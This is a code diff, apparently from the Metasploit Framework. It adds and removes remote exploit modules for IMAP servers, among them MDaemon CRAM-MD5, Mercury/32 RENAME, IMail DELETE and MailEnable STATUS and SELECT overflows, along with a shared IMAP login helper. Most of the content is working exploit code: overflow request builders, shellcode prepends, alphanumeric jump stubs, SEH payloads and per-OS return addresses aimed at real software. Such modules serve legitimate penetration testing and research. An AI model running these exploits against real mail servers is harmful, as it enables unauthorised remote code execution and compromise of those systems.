'RHOST' => [1, 'ADDR', 'The target address'],
|
|
||||||
'RPORT' => [1, 'PORT', 'The target port', 143],
|
|
||||||
},
|
|
||||||
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
|
|
||||||
'Space' => 500,
|
|
||||||
'BadChars' => "\x00",
|
|
||||||
},
|
|
||||||
|
|
||||||
'Description' => Pex::Text::Freeform(qq{
|
|
||||||
This module exploits a buffer overflow in the CRAM-MD5 authentication of the
|
|
||||||
MDaemon IMAP service. This vulnerability was discovered by Muts.
|
|
||||||
}),
|
|
||||||
|
|
||||||
'Refs' =>
|
|
||||||
[
|
|
||||||
['OSVDB', '11838'],
|
|
||||||
['CVE', '2004-1520'],
|
|
||||||
['BID', '11675'],
|
|
||||||
['MIL', '90'],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
['MDaemon IMAP 8.0.3 Windows XP SP2'],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Keys' => ['mdaemon'],
|
|
||||||
|
|
||||||
'DisclosureDate' => 'Nov 12 2004',
|
|
||||||
};
|
|
||||||
|
|
||||||
sub new {
|
|
||||||
my $class = shift;
|
|
||||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
||||||
|
|
||||||
return($self);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Exploit {
|
|
||||||
my $self = shift;
|
|
||||||
|
|
||||||
my $targetHost = $self->GetVar('RHOST');
|
|
||||||
my $targetPort = $self->GetVar('RPORT');
|
|
||||||
my $targetIndex = $self->GetVar('TARGET');
|
|
||||||
my $encodedPayload = $self->GetVar('EncodedPayload');
|
|
||||||
my $shellcode = $encodedPayload->Payload;
|
|
||||||
my $target = $self->Targets->[$targetIndex];
|
|
||||||
|
|
||||||
if (! $self->InitNops(128)) {
|
|
||||||
$self->PrintLine("[*] Failed to initialize the NOP module.");
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
my $sock = Msf::Socket::Tcp->new(
|
|
||||||
'PeerAddr' => $targetHost,
|
|
||||||
'PeerPort' => $targetPort,
|
|
||||||
);
|
|
||||||
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Error creating socket: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got Banner: ' . $resp);
|
|
||||||
|
|
||||||
my $req = "a001 authenticate cram-md5\r\n";
|
|
||||||
$sock->Send($req);
|
|
||||||
$self->PrintLine('[*] CRAM-MD5 authentication method asked');
|
|
||||||
|
|
||||||
$resp = $sock->Recv(-1);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp);
|
|
||||||
|
|
||||||
# Magic no return-address exploitation ninjaness!
|
|
||||||
$req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff";
|
|
||||||
$req = Pex::Text::Base64Encode($req, '') . "\r\n";
|
|
||||||
$sock->Send($req);
|
|
||||||
$self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent');
|
|
||||||
|
|
||||||
$resp = $sock->Recv(-1);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got authentication reply: ' . $resp);
|
|
||||||
|
|
||||||
$req = "a002 LOGOUT\r\n";
|
|
||||||
$sock->Send($req);
|
|
||||||
$self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception');
|
|
||||||
|
|
||||||
$resp = $sock->Recv(-1);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got LOGOUT reply: ' . $resp);
|
|
||||||
|
|
||||||
$self->PrintLine("[*] Overflow request sent, sleeping for one second");
|
|
||||||
select(undef, undef, undef, 1);
|
|
||||||
|
|
||||||
$self->Handler($sock);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
1;
|
|
||||||
|
|
||||||
=end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,228 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
Mercury/32 v4.01a IMAP server is prone to a remotely
|
|
||||||
exploitable stack-based buffer overflow vulnerability. This
|
|
||||||
issue is due to a failure of the application to properly
|
|
||||||
bounds check user-supplied data prior to copying it to a
|
|
||||||
fixed size memory buffer.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'y0 <y0@w00t-shell.net>' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'CVE', '2004-1211'],
|
|
||||||
[ 'BID', '11775'],
|
|
||||||
[ 'NSS', '15867'],
|
|
||||||
[ 'MIL', '98'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 500,
|
|
||||||
'BadChars' => "\x00\x0a\x0d\x20",
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Automatic Targetting',
|
|
||||||
{
|
|
||||||
'Platform' => 'win32',
|
|
||||||
'Ret' => 0x0,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Nov 29 2004',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be redistributed
|
|
||||||
# according to the licenses defined in the Authors field below. In the
|
|
||||||
# case of an unknown or missing license, this file defaults to the same
|
|
||||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
|
||||||
# version of the Framework can always be obtained from metasploit.com.
|
|
||||||
##
|
|
||||||
|
|
||||||
package Msf::Exploit::mercury_imap;
|
|
||||||
use strict;
|
|
||||||
use base 'Msf::Exploit';
|
|
||||||
use Msf::Socket::Tcp;
|
|
||||||
use Pex::Text;
|
|
||||||
|
|
||||||
my $advanced = {
|
|
||||||
};
|
|
||||||
|
|
||||||
my $info = {
|
|
||||||
'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
|
|
||||||
'Arch' => [ 'x86' ],
|
|
||||||
'OS' => [ 'win32'],
|
|
||||||
'Priv' => 1,
|
|
||||||
|
|
||||||
'UserOpts' =>
|
|
||||||
{
|
|
||||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
||||||
'RPORT' => [1, 'PORT', 'The target port', 143],
|
|
||||||
'USER' => [1, 'DATA', 'IMAP Username'],
|
|
||||||
'PASS' => [1, 'DATA', 'IMAP Password'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 500,
|
|
||||||
'BadChars' => "\x00\x0a\x0d\x20",
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
'Keys' => ['+ws2ord'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'Description' => Pex::Text::Freeform(qq{
|
|
||||||
Mercury/32 v4.01a IMAP server is prone to a remotely exploitable
|
|
||||||
stack-based buffer overflow vulnerability. This issue is due
|
|
||||||
to a failure of the application to properly bounds check
|
|
||||||
user-supplied data prior to copying it to a fixed size memory buffer.
|
|
||||||
}),
|
|
||||||
|
|
||||||
'Refs' =>
|
|
||||||
[
|
|
||||||
['CVE','2004-1211'],
|
|
||||||
['BID', '11775'],
|
|
||||||
['NSS', '15867'],
|
|
||||||
['MIL', '98'],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
['Windows 2000 SP4 English', 0x7c2f8498 ],
|
|
||||||
['Windows 2000 SP4 English', 0x7846107b],
|
|
||||||
['Windows XP Pro SP0 English', 0x77dc0df0 ],
|
|
||||||
['Windows XP Pro SP1 English', 0x77e53877 ],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Keys' => ['imap'],
|
|
||||||
|
|
||||||
'DisclosureDate' => 'Nov 29 2004',
|
|
||||||
};
|
|
||||||
|
|
||||||
sub new {
|
|
||||||
my $class = shift;
|
|
||||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
||||||
|
|
||||||
return($self);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Check {
|
|
||||||
my ($self) = @_;
|
|
||||||
my $target_host = $self->GetVar('RHOST');
|
|
||||||
my $target_port = $self->GetVar('RPORT');
|
|
||||||
|
|
||||||
my $s = Msf::Socket::Tcp->new
|
|
||||||
(
|
|
||||||
'PeerAddr' => $target_host,
|
|
||||||
'PeerPort' => $target_port,
|
|
||||||
'LocalPort' => $self->GetVar('CPORT'),
|
|
||||||
'SSL' => $self->GetVar('SSL'),
|
|
||||||
);
|
|
||||||
|
|
||||||
if ($s->IsError) {
|
|
||||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
|
||||||
return $self->CheckCode('Connect');
|
|
||||||
}
|
|
||||||
|
|
||||||
$s->Send("a001 LOGOUT\r\n");
|
|
||||||
my $res = $s->Recv(-1, 20);
|
|
||||||
$s->Close();
|
|
||||||
|
|
||||||
if ($res !~ /Mercury\/32 v4\.01a/) {
|
|
||||||
$self->PrintLine("[*] This server does not appear to be vulnerable.");
|
|
||||||
return $self->CheckCode('Safe');
|
|
||||||
}
|
|
||||||
|
|
||||||
$self->PrintLine("[*] Vulnerable installation detected :-)");
|
|
||||||
return $self->CheckCode('Detected');
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Exploit {
|
|
||||||
my $self = shift;
|
|
||||||
|
|
||||||
my $targetHost = $self->GetVar('RHOST');
|
|
||||||
my $targetPort = $self->GetVar('RPORT');
|
|
||||||
my $targetIndex = $self->GetVar('TARGET');
|
|
||||||
my $user = $self->GetVar('USER');
|
|
||||||
my $pass = $self->GetVar('PASS');
|
|
||||||
my $encodedPayload = $self->GetVar('EncodedPayload');
|
|
||||||
my $shellcode = $encodedPayload->Payload;
|
|
||||||
my $target = $self->Targets->[$targetIndex];
|
|
||||||
|
|
||||||
my $sock = Msf::Socket::Tcp->new(
|
|
||||||
'PeerAddr' => $targetHost,
|
|
||||||
'PeerPort' => $targetPort,
|
|
||||||
);
|
|
||||||
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Error creating socket: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got Banner: ' . $resp);
|
|
||||||
|
|
||||||
my $sploit = "a001 LOGIN $user $pass\r\n";
|
|
||||||
$sock->Send($sploit);
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Socket error: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
if($resp !~ /^a001 OK LOGIN/) {
|
|
||||||
$self->PrintLine('Login error: ' . $resp);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
$self->PrintLine('[*] Logged in, sending overflow...');
|
|
||||||
|
|
||||||
my $splat = Pex::Text::UpperCaseText(260);
|
|
||||||
$sploit =
|
|
||||||
"a001 RENAME ". $splat. pack('V', $target->[1]).
|
|
||||||
$shellcode. "\r\n";
|
|
||||||
|
|
||||||
$sock->Send($sploit);
|
|
||||||
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
if(length($resp)) {
|
|
||||||
$self->PrintLine('[*] Got response, bad: ' . $resp);
|
|
||||||
}
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
1;
|
|
||||||
|
|
||||||
=end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -214,7 +214,8 @@ class Exploit < Msf::Module
|
||||||
require 'msf/core/exploit/mssql'
|
require 'msf/core/exploit/mssql'
|
||||||
require 'msf/core/exploit/arkeia'
|
require 'msf/core/exploit/arkeia'
|
||||||
require 'msf/core/exploit/ndmp'
|
require 'msf/core/exploit/ndmp'
|
||||||
|
require 'msf/core/exploit/imap'
|
||||||
|
|
||||||
#
|
#
|
||||||
# Creates an instance of the exploit module. Mad skillz.
|
# Creates an instance of the exploit module. Mad skillz.
|
||||||
#
|
#
|
||||||
|
|
|
@ -54,18 +54,29 @@ module Exploit::Remote::Ftp
|
||||||
def connect_login(global = true)
|
def connect_login(global = true)
|
||||||
ftpsock = connect(global)
|
ftpsock = connect(global)
|
||||||
|
|
||||||
# If the user supplied a username, send that
|
if (not (user and pass))
|
||||||
if (user)
|
print_status("No username and password were supplied, unable to login")
|
||||||
print_status("Sending username #{user}...")
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
res = send_user(user, ftpsock)
|
print_status("Authenticating as #{user} with password #{pass}...")
|
||||||
|
res = send_user(user, ftpsock)
|
||||||
|
|
||||||
|
if (res !~ /^(331|2)/)
|
||||||
|
print_status("The server rejected our username")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
# If the user supplied a password, send that
|
if (pass)
|
||||||
if (pass)
|
print_status("Sending password...")
|
||||||
print_status("Sending password...")
|
res = send_pass(pass, ftpsock)
|
||||||
res = send_pass(pass, ftpsock)
|
if (res !~ /^2/)
|
||||||
|
print_status("The server rejected our password")
|
||||||
|
return false
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
|
@ -0,0 +1,115 @@
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
require 'msf/core/exploit/tcp'
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# This module exposes methods that may be useful to exploits that deal with
|
||||||
|
# servers that speak the IMAP protocol.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
module Exploit::Remote::Imap
|
||||||
|
|
||||||
|
include Exploit::Remote::Tcp
|
||||||
|
|
||||||
|
#
|
||||||
|
# Creates an instance of an FTP exploit module.
|
||||||
|
#
|
||||||
|
def initialize(info = {})
|
||||||
|
super
|
||||||
|
|
||||||
|
# Register the options that all FTP exploits may make use of.
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RHOST,
|
||||||
|
Opt::RPORT(143),
|
||||||
|
OptString.new('USER', [ false, 'The username to authenticate as']),
|
||||||
|
OptString.new('PASS', [ false, 'The password for the specified username'])
|
||||||
|
], Msf::Exploit::Remote::Ftp)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# This method establishes a IMAP connection to host and port specified by
|
||||||
|
# the RHOST and RPORT options, respectively. After connecting, the banner
|
||||||
|
# message is read in and stored in the 'banner' attribute.
|
||||||
|
#
|
||||||
|
def connect(global = true)
|
||||||
|
print_status("Connecting to IMAP server #{rhost}:#{rport}...")
|
||||||
|
|
||||||
|
fd = super
|
||||||
|
|
||||||
|
# Wait for a banner to arrive...
|
||||||
|
self.banner = fd.get_once
|
||||||
|
|
||||||
|
print_status("Connected to target IMAP server.")
|
||||||
|
|
||||||
|
# Return the file descriptor to the caller
|
||||||
|
fd
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Connect and login to the remote IMAP server using the credentials
|
||||||
|
# that have been supplied in the exploit options.
|
||||||
|
#
|
||||||
|
def connect_login(global = true)
|
||||||
|
ftpsock = connect(global)
|
||||||
|
|
||||||
|
|
||||||
|
if (not (user and pass))
|
||||||
|
print_status("No username and password were supplied, unable to login")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Authenticating as #{user} with password #{pass}...")
|
||||||
|
raw_send_recv("a001 LOGIN #{user} #{pass}\r\n")
|
||||||
|
res = sock.get_once
|
||||||
|
|
||||||
|
if (res !~ /^a001 OK/)
|
||||||
|
print_status("Authentication failed")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# This method transmits an IMAP command and waits for a response. If one is
|
||||||
|
# received, it is returned to the caller.
|
||||||
|
#
|
||||||
|
def raw_send_recv(cmd, nsock = self.sock)
|
||||||
|
nsock.put(cmd)
|
||||||
|
nsock.get_once
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
##
|
||||||
|
#
|
||||||
|
# Wrappers for getters
|
||||||
|
#
|
||||||
|
##
|
||||||
|
|
||||||
|
#
|
||||||
|
# Returns the user string from the 'USER' option.
|
||||||
|
#
|
||||||
|
def user
|
||||||
|
datastore['USER']
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Returns the user string from the 'PASS' option.
|
||||||
|
#
|
||||||
|
def pass
|
||||||
|
datastore['PASS']
|
||||||
|
end
|
||||||
|
|
||||||
|
protected
|
||||||
|
|
||||||
|
#
|
||||||
|
# This attribute holds the banner that was read in after a successful call
|
||||||
|
# to connect or connect_login.
|
||||||
|
#
|
||||||
|
attr_accessor :banner
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -19,6 +19,7 @@ class Msf::Module::Author
|
||||||
'optyx' => 'optyx@hatesemail.com',
|
'optyx' => 'optyx@hatesemail.com',
|
||||||
'anonymous' => 'anonymous-contributor@metasploit.com',
|
'anonymous' => 'anonymous-contributor@metasploit.com',
|
||||||
'stinko' => 'vinnie@metasploit.com',
|
'stinko' => 'vinnie@metasploit.com',
|
||||||
|
'MC' => 'y0@w00t-shell.net',
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -170,7 +170,7 @@ module Text
|
||||||
# Base64 encoder
|
# Base64 encoder
|
||||||
#
|
#
|
||||||
def self.encode_base64(str)
|
def self.encode_base64(str)
|
||||||
Base64.encode64(str)
|
Base64.encode64(str).chomp
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
|
|
@ -0,0 +1,86 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::Imap
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'IMail IMAP4D Delete Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a buffer overflow in the 'DELETE'
|
||||||
|
command of the the IMail IMAP4D service. This vulnerability
|
||||||
|
can only be exploited with a valid username and password.
|
||||||
|
This flaw was patched in version 8.14.
|
||||||
|
|
||||||
|
},
|
||||||
|
'Author' => [ 'spoonm' ],
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'OSVDB', '11838'],
|
||||||
|
[ 'BID', '11675'],
|
||||||
|
[ 'MIL', '33'],
|
||||||
|
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'GETPCTYPE' => 'edx',
|
||||||
|
'EXITFUNC' => 'thread',
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 614,
|
||||||
|
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
|
||||||
|
'StackAdjustment' => -3500,
|
||||||
|
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
# alphanum rets :(, will look more into it later
|
||||||
|
['Windows XP sp0 comctl32.dll', { 'Ret' => 0x77364650 }],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Nov 12 2004',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
connect_login
|
||||||
|
|
||||||
|
print_status("Sending overflow string...")
|
||||||
|
req = 'A683 DELETE '
|
||||||
|
req << payload.encoded
|
||||||
|
|
||||||
|
# Jump over code
|
||||||
|
req << "\x74\x32\x75\x30"
|
||||||
|
req << [target.ret].pack('V')
|
||||||
|
req << Rex::Text.rand_text_alphanumeric(44)
|
||||||
|
|
||||||
|
# GetEIP code
|
||||||
|
req << "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59"
|
||||||
|
req << "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59"
|
||||||
|
|
||||||
|
# Alphanumeric jmp back (edx context)
|
||||||
|
req << "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41"
|
||||||
|
req << "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50"
|
||||||
|
req << "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57"
|
||||||
|
req << "\x70\x55\x50\x4b\x4f\x6b\x52\x6a"
|
||||||
|
|
||||||
|
# Run off the stack, so we don't kill our payload, or something...
|
||||||
|
req << Rex::Text.rand_text_alphanumeric(600)
|
||||||
|
|
||||||
|
# Terminate the request
|
||||||
|
req << "\r\n"
|
||||||
|
|
||||||
|
sock.put(req)
|
||||||
|
|
||||||
|
handler
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,66 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Windows::Imap::MailEnableImapStatusOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::Imap
|
||||||
|
include Exploit::Remote::Seh
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
MailEnable's IMAP server contains a buffer overflow
|
||||||
|
vulnerability in the STATUS command. With proper
|
||||||
|
credentials, this could allow for the execution of arbitrary
|
||||||
|
code.
|
||||||
|
|
||||||
|
},
|
||||||
|
'Author' => [ 'MC' ],
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'CVE', '2005-2278'],
|
||||||
|
[ 'BID', '14243'],
|
||||||
|
[ 'NSS', '19193'],
|
||||||
|
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'thread',
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 450,
|
||||||
|
'BadChars' => "\x00\x0a\x0d\x20",
|
||||||
|
'StackAdjustment' => -3500,
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['MailEnable 1.54 Pro Universal', { 'Rets' => [9273, 0x1001c019] }], #MEAISP.DLL
|
||||||
|
['Windows XP Pro SP0/SP1 English', { 'Rets' => [9273, 0x71aa32ad] }],
|
||||||
|
['Windows 2000 Pro English ALL', { 'Rets' => [9273, 0x75022ac4] }],
|
||||||
|
['Windows 2003 Server English', { 'Rets' => [9273, 0x7ffc0638] }],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Jul 13 2005',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
connect_login
|
||||||
|
|
||||||
|
seh = generate_seh_payload(target['Rets'][1])
|
||||||
|
buf = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
|
||||||
|
req = "a001 STATUS \".\x00" + buf + seh
|
||||||
|
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
|
||||||
|
sock.put(req)
|
||||||
|
|
||||||
|
handler
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,73 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Windows::Imap::MailEnableImapW3CLoggingSelectOverflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::Imap
|
||||||
|
include Exploit::Remote::Seh
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a buffer overflow in the W3C logging
|
||||||
|
functionality of the MailEnable IMAPD service. Logging is
|
||||||
|
not enabled by default and this exploit requires a valid
|
||||||
|
username and password to exploit the flaw. MailEnable
|
||||||
|
Professional version 1.6 and prior and MailEnable Enterprise
|
||||||
|
version 1.1 and prior are affected.
|
||||||
|
|
||||||
|
},
|
||||||
|
'Author' => [ 'MC' ],
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'BID', '15006'],
|
||||||
|
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'thread',
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 600,
|
||||||
|
'BadChars' => "\x00\x0a\x0d\x20",
|
||||||
|
'StackAdjustment' => -3500,
|
||||||
|
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL
|
||||||
|
],
|
||||||
|
'DisclosureDate' => '',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
connect
|
||||||
|
disconnect
|
||||||
|
|
||||||
|
if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)
|
||||||
|
return Exploit::CheckCode::Vulnerable
|
||||||
|
end
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
connect_login
|
||||||
|
|
||||||
|
buf = Rex::Text.rand_text_alphanumeric(6196, payload_badchars)
|
||||||
|
seh = generate_seh_payload(target.ret)
|
||||||
|
req = 'a01 SELECT ' + buf + seh + "\r\n"
|
||||||
|
sock.put(req)
|
||||||
|
|
||||||
|
handler
|
||||||
|
disconnect
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,77 @@
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
class Exploits::Windows::Imap::MDaemonImapCramMD5Overflow < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
include Exploit::Remote::Imap
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a buffer overflow in the CRAM-MD5
|
||||||
|
authentication of the MDaemon IMAP service. This
|
||||||
|
vulnerability was discovered by Muts.
|
||||||
|
|
||||||
|
},
|
||||||
|
'Author' => [ 'anonymous' ],
|
||||||
|
'Version' => '$Revision$',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'OSVDB', '11838'],
|
||||||
|
[ 'CVE', '2004-1520'],
|
||||||
|
[ 'BID', '11675'],
|
||||||
|
[ 'MIL', '90'],
|
||||||
|
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'EXITFUNC' => 'process',
|
||||||
|
},
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Space' => 500,
|
||||||
|
'BadChars' => "\x00",
|
||||||
|
'StackAdjustment' => -3500,
|
||||||
|
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Nov 12 2004',
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
connect
|
||||||
|
|
||||||
|
print_status("Asking for CRAM-MD5 authentication...")
|
||||||
|
sock.put("a001 authenticate cram-md5\r\n")
|
||||||
|
